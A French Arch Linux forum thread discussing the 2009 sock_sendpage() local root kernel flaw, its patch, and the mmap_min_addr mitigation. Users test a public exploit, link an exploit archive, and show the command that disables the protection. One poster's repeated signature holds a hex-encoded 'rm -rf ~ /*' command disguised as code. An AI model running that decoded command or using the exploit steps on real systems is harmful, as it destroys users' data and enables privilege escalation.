[securite]Faille critique kernel 2.4 et 2.6

Reconnaissance et configuration du matériel / kernel linux
Répondre
Avatar de l’utilisateur
r4is3_your_g0d
Hankyu
Messages : 27
Inscription : jeu. 23 juil. 2009, 21:05

[securite]Faille critique kernel 2.4 et 2.6

Message par r4is3_your_g0d »

Bonjour à tous,

Un 0day est apparue sous la forme d'un local root exploit lié a sock_sendpage() tous les kernel depuis le 2.4.37.5 jusqu'au 2.6.31-rc6 sont vulnerables voir ici. Un patch a deja etait mis à disposition par Linus Torvalds : http://git.kernel.org/?p=linux/kernel/g ... 45cf0f1b98
Des news pour un prochaine MAJ sous Arch?
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Avatar de l’utilisateur
Skunnyk
Maître du Kyudo
Messages : 1137
Inscription : mer. 06 sept. 2006, 21:31
Localisation : IRC
Contact :

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par Skunnyk »

Je crains pas, j'ai pas Pulse Audio :-P (https://linuxfr.org/~patrick_g/28661.html )

Humour à part (il faut apparement pulse audio quand on a selinux, sinon pas besoin), le package archlinux sortira quand une release du kernel sera faite je pense, comme pour la faille du même genre il y a quelques semaines.

Pärt contre coup sur coup 2 failles local root exploit, c'est assez rare
Avatar de l’utilisateur
Skunnyk
Maître du Kyudo
Messages : 1137
Inscription : mer. 06 sept. 2006, 21:31
Localisation : IRC
Contact :

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par Skunnyk »

Je viens de tester l'exploit sur mon arch:

$ ./wunderbar_emporium.sh
[+] Personality set to: PER_SVR4
Pulseaudio does not exist!


Je n'ai ni pulse audio, ni selinux. Quelqu'un avec PA peut tester ? :-)
Avatar de l’utilisateur
r4is3_your_g0d
Hankyu
Messages : 27
Inscription : jeu. 23 juil. 2009, 21:05

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par r4is3_your_g0d »

Les exploit sont assez ressemblant apparement. j'ai pas encore regarder le dernier, (j'y vais d'ailleur juste aprés) mais c'est vrai que deux vuln aussi critique en aussi peu de temps :shock:
J'avais pas lu tout le fil mais :
-------------------
Mitigation
-----------------------

Recent kernels with mmap_min_addr support may prevent exploitation if
the sysctl vm.mmap_min_addr is set above zero. However, administrators
should be aware that LSM based mandatory access control systems, such
as SELinux, may alter this functionality.
Donc comme tu disais, à moins d'avoir SELinux, on est assez à l'abri.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Avatar de l’utilisateur
ddup1
Chu Ko Nu
Messages : 338
Inscription : lun. 15 sept. 2008, 20:59
Localisation : Toulouse

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par ddup1 »

Perso l'exploi à échoué sur mon Arch
Un clavier azerty en vaut deux :D
http://www.dupnet.org/dotclear/
Avatar de l’utilisateur
r4is3_your_g0d
Hankyu
Messages : 27
Inscription : jeu. 23 juil. 2009, 21:05

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par r4is3_your_g0d »

Skunnyk a écrit :Je viens de tester l'exploit sur mon arch:

$ ./wunderbar_emporium.sh
[+] Personality set to: PER_SVR4
Pulseaudio does not exist!


Je n'ai ni pulse audio, ni selinux. Quelqu'un avec PA peut tester ? :-)
Marche pas non, pas PA, par contre sur milw0rm il y a un autre exploit : http://milw0rm.com/sploits/2009-proto_ops.tgz
et le resultat :

Code : Tout sélectionner

padlina z lublina
failed
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Avatar de l’utilisateur
ddup1
Chu Ko Nu
Messages : 338
Inscription : lun. 15 sept. 2008, 20:59
Localisation : Toulouse

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par ddup1 »

En fait par défaut Archlinux est protégé contre cet exploit.

Mais après un :

Code : Tout sélectionner

echo 0 >/proc/sys/vm/mmap_min_addr 
Et l'exploit devient fonctionnel (avec pulseaudio ou pas, PA ne sert que pour contrer SELinux à priori)
Un clavier azerty en vaut deux :D
http://www.dupnet.org/dotclear/
Avatar de l’utilisateur
r4is3_your_g0d
Hankyu
Messages : 27
Inscription : jeu. 23 juil. 2009, 21:05

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par r4is3_your_g0d »

Oui c'est le premier truc que j'ai verifié aprés avoir lu ca et avant de me demander si j'allais appliquer le patch.
chez moi :

Code : Tout sélectionner

sysctl -a | grep mmap_min_addr
vm.mmap_min_addr = 4096
:bravo: Du coup ca mitige enormement la decouverte. En tous cas je suis bien content d'avoir ouvert ce topic parcequ'habituellement ca parle pas beaucoup de sécurité par ici.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Avatar de l’utilisateur
ddup1
Chu Ko Nu
Messages : 338
Inscription : lun. 15 sept. 2008, 20:59
Localisation : Toulouse

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par ddup1 »

Oui mais débin/ubuntu/redhat sont faillible à cet exploit.

Y'a un ientérêt à pouvoir mapper en 0 ?
Un clavier azerty en vaut deux :D
http://www.dupnet.org/dotclear/
Avatar de l’utilisateur
r4is3_your_g0d
Hankyu
Messages : 27
Inscription : jeu. 23 juil. 2009, 21:05

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par r4is3_your_g0d »

ddup1 a écrit :Oui mais débin/ubuntu/redhat sont faillible à cet exploit.
Par defaut?? nan quand même pas??

Et mapper en 0 iol n'y a pas d'interet (enfin sauf si on veut winer n'importe quoi) bien au contraire, justement l'option protege l'accés aux adresses basses en userland ca empeche donc les NULL pointer dereference.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Avatar de l’utilisateur
ddup1
Chu Ko Nu
Messages : 338
Inscription : lun. 15 sept. 2008, 20:59
Localisation : Toulouse

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par ddup1 »

Sisi les distrib citées sont faillibles :(

Edit : possible piste distrib ayant installé wine par exemple, lu sur linuxfr :

# Wine needs to access the bottom 64k of memory in order to launch
# 16 bit programs.
vm.mmap_min_addr = 0
Un clavier azerty en vaut deux :D
http://www.dupnet.org/dotclear/
Avatar de l’utilisateur
r4is3_your_g0d
Hankyu
Messages : 27
Inscription : jeu. 23 juil. 2009, 21:05

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par r4is3_your_g0d »

Arf Debian quand même :cry:

Sinon oui c'est ce que je voulais dire quand je parlais de winer n'importe quoi, d'ailleurs c'est hallucinant le nombre tuto et forum qui conseillent direct de mapper en 0 dés qu'il y a un probleme avec wine, ca en dit long sur le nombre de machines potentiellement faillibles.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Avatar de l’utilisateur
ddup1
Chu Ko Nu
Messages : 338
Inscription : lun. 15 sept. 2008, 20:59
Localisation : Toulouse

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par ddup1 »

Ben la meme pas besoin de conseiller, c'est un fichier installé avec wine dans /etc/sysctl.d :d
Un clavier azerty en vaut deux :D
http://www.dupnet.org/dotclear/
Avatar de l’utilisateur
r4is3_your_g0d
Hankyu
Messages : 27
Inscription : jeu. 23 juil. 2009, 21:05

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par r4is3_your_g0d »

choqued! Je ne wine rien puisqu'il n'y a rien d'interessant à prendre chez windows. Peut-être pour les gamers mais je ne joue pas. Il va falloir rester attentif tout de même parcequ'à mon avis il risque d'y avoir pas mal d'exploits qui vont fleurir ces prochaines semaines.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Avatar de l’utilisateur
ddup1
Chu Ko Nu
Messages : 338
Inscription : lun. 15 sept. 2008, 20:59
Localisation : Toulouse

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par ddup1 »

D'autant plus que ce hack wine semble limité aux applications 16bits, même sous windows ca devient rare ce genre d'appli :/
Un clavier azerty en vaut deux :D
http://www.dupnet.org/dotclear/
Avatar de l’utilisateur
ddup1
Chu Ko Nu
Messages : 338
Inscription : lun. 15 sept. 2008, 20:59
Localisation : Toulouse

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par ddup1 »

Archlinux est à jour :

diff -Nur linux-2.6.30/net/socket.c linux-2.6.30-ARCH/net/socket.c
--- linux-2.6.30/net/socket.c 2009-06-10 05:05:27.000000000 +0200
+++ linux-2.6.30-ARCH/net/socket.c 2009-08-17 14:33:27.929112920 +0200
@@ -736,7 +736,7 @@
if (more)
flags |= MSG_MORE;

- return sock->ops->sendpage(sock, page, offset, size, flags);
+ return kernel_sendpage(sock, page, offset, size, flags);
}

Voila plus de risque lié à cette faille sur Arch à jour ;)
Un clavier azerty en vaut deux :D
http://www.dupnet.org/dotclear/
Avatar de l’utilisateur
Skunnyk
Maître du Kyudo
Messages : 1137
Inscription : mer. 06 sept. 2006, 21:31
Localisation : IRC
Contact :

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par Skunnyk »

Il ne reste plus qu'a attendre la prochaine 8)
Avatar de l’utilisateur
r4is3_your_g0d
Hankyu
Messages : 27
Inscription : jeu. 23 juil. 2009, 21:05

Re: [securite]Faille critique kernel 2.4 et 2.6

Message par r4is3_your_g0d »

ddup1 a écrit :Archlinux est à jour :

diff -Nur linux-2.6.30/net/socket.c linux-2.6.30-ARCH/net/socket.c
--- linux-2.6.30/net/socket.c 2009-06-10 05:05:27.000000000 +0200
+++ linux-2.6.30-ARCH/net/socket.c 2009-08-17 14:33:27.929112920 +0200
@@ -736,7 +736,7 @@
if (more)
flags |= MSG_MORE;

- return sock->ops->sendpage(sock, page, offset, size, flags);
+ return kernel_sendpage(sock, page, offset, size, flags);
}

Voila plus de risque lié à cette faille sur Arch à jour ;)
C'est pour des trucs comme ca que je ne me demande jamais pourqui j'adore cette distrib :)
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Répondre